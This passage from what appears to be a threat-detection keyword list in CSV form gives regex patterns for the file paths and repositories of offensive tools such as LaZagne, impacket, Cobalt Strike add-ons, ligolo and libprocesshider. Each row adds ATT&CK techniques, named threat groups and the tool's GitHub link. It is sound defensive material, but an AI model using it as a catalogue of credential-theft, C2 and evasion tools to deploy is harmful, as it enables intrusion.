Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","8458"
"*/laZagne.py*",".{0,1000}\/laZagne\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","8459"
"*/LaZagne.py*",".{0,1000}\/LaZagne\.py.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","8460"
"*/lazagne.zip*",".{0,1000}\/lazagne\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","8461"
"*/LaZagne/Windows/*",".{0,1000}\/LaZagne\/Windows\/.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","8462"
"*/ldap.py*",".{0,1000}\/ldap\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","8464"
"*/ldap_injection.txt*",".{0,1000}\/ldap_injection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","8465"
"*/ldap_search_bof.py*",".{0,1000}\/ldap_search_bof\.py.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","N/A","5","4","328","56","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z","8466"
"*/ldap-brute.nse*",".{0,1000}\/ldap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8467"
"*/ldap-checker.py*",".{0,1000}\/ldap\-checker\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","8468"
"*/ldapnomnom.git*",".{0,1000}\/ldapnomnom\.git.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","8469"
"*/ldapnomnom/releases/download/*",".{0,1000}\/ldapnomnom\/releases\/download\/.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","8470"
"*/ldapnomnom@latest*",".{0,1000}\/ldapnomnom\@latest.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","1","N/A","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","8471"
"*/ldap-novell-getpass.nse*",".{0,1000}\/ldap\-novell\-getpass\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8472"
"*/LDAP-Password-Hunter.git*",".{0,1000}\/LDAP\-Password\-Hunter\.git.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","1","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","8473"
"*/LDAPPER.git*",".{0,1000}\/LDAPPER\.git.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","8474"
"*/ldapper.py*",".{0,1000}\/ldapper\.py.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","8475"
"*/LDAPPER-master*",".{0,1000}\/LDAPPER\-master.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","0","N/A","N/A","7","1","99","11","2024-11-09T03:53:26Z","2020-06-17T16:53:35Z","8476"
"*/ldapph.db*",".{0,1000}\/ldapph\.db.{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","Password Hunter in Active Directory","T1087.002","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","7","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","8477"
"*/LdapRelayScan.git*",".{0,1000}\/LdapRelayScan\.git.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","8478"
"*/ldap-rootdse.nse*",".{0,1000}\/ldap\-rootdse\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8479"
"*/ldap-search.nse*",".{0,1000}\/ldap\-search\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8480"
"*/ldapsearch-ad.git*",".{0,1000}\/ldapsearch\-ad\.git.{0,1000}","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","#linux #windows","N/A","5","3","215","36","2024-12-10T17:00:02Z","2019-12-08T00:25:57Z","8481"
"*/ldapsearch-ad.py*",".{0,1000}\/ldapsearch\-ad\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","1","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","8482"
"*/LDAPWordlistHarvester.git*",".{0,1000}\/LDAPWordlistHarvester\.git.{0,1000}","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","Black Basta","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","N/A","5","4","N/A","N/A","N/A","N/A","8483"
"*/ldeep/*",".{0,1000}\/ldeep\/.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","8484"
"*/ldeepDump*",".{0,1000}\/ldeepDump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","8485"
"*/LdrLockLiberator.git*",".{0,1000}\/LdrLockLiberator\.git.{0,1000}","offensive_tool_keyword","LdrLockLiberator","LdrLockLiberator is a collection of techniques for escaping or otherwise forgoing Loader Lock while executing your code from DllMain or anywhere else the lock may be present.","T1574.002 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/ElliotKillick/LdrLockLiberator","1","1","N/A","N/A","9","4","375","65","2024-10-29T23:05:45Z","2023-10-31T10:11:16Z","8486"
"*/legba.git*",".{0,1000}\/legba\.git.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","1","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","8487"
"*/legba/target/release/legba*",".{0,1000}\/legba\/target\/release\/legba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","#linux","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","8488"
"*/letmein.ps1*",".{0,1000}\/letmein\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","8489"
"*/LetMeOutSharp/*",".{0,1000}\/LetMeOutSharp\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","N/A","10","10","141","25","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z","8490"
"*/LetMeowIn.git*",".{0,1000}\/LetMeowIn\.git.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","8491"
"*/lexmark-config.nse*",".{0,1000}\/lexmark\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","8494"
"*/lfs_injection.exe*",".{0,1000}\/lfs_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","8495"
"*/lgandx/Responder*",".{0,1000}\/lgandx\/Responder.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","8496"
"*/lib/GHunt/*",".{0,1000}\/lib\/GHunt\/.{0,1000}","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","Reconnaissance","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","N/A","10","1139","106","2025-01-28T19:07:29Z","2020-04-07T22:25:38Z","8497"
"*/lib/gsocket_*.so*",".{0,1000}\/lib\/gsocket_.{0,1000}\.so.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","8498"
"*/lib/ipLookupHelper.py*",".{0,1000}\/lib\/ipLookupHelper\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","N/A","10","10","964","143","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z","8499"
"*/lib/msf/*",".{0,1000}\/lib\/msf\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8500"
"*/lib/systemd/system/evil.service*",".{0,1000}\/lib\/systemd\/system\/evil\.service.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","8501"
"*/libgobuster*",".{0,1000}\/libgobuster.{0,1000}","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1046 - T1590.002 - T1590.005","TA0007 - TA0043 - TA0006","N/A","Volatile Cedar","Reconnaissance","https://github.com/OJ/gobuster","1","1","#linux","network exploitation tool","N/A","10","11434","1338","2025-04-17T06:41:43Z","2014-11-14T13:18:35Z","8503"
"*/liboffsetfinder64*",".{0,1000}\/liboffsetfinder64.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","8504"
"*/libprocesshider.git*",".{0,1000}\/libprocesshider\.git.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","1","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","8505"
"*/libprocesshider.so*",".{0,1000}\/libprocesshider\.so.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","8506"
"*/libs/powershells/upload.ps1*",".{0,1000}\/libs\/powershells\/upload\.ps1.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","0","#linux","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","8508"
"*/LibSnaffle*",".{0,1000}\/LibSnaffle.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","1","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","8509"
"*/LightsOut.git*",".{0,1000}\/LightsOut\.git.{0,1000}","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tool","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","10","4","321","44","2024-07-15T21:29:16Z","2023-06-01T14:57:44Z","8510"
"*/ligolo.git*",".{0,1000}\/ligolo\.git.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8511"
"*/ligolo_agent*",".{0,1000}\/ligolo_agent.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","0","#linux","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8512"
"*/ligolo_agent.exe*",".{0,1000}\/ligolo_agent\.exe.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8513"
"*/ligolo-ng*",".{0,1000}\/ligolo\-ng.{0,1000}","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","AvosLocker - LockBit","C2","https://github.com/sysdream/ligolo","1","1","N/A","N/A","10","10","1764","224","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z","8514"
"*/ligolo-ng.git*",".{0,1000}\/ligolo\-ng\.git.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","8515"
"*/ligolo-ng/releases*",".{0,1000}\/ligolo\-ng\/releases.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","1","N/A","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","8516"
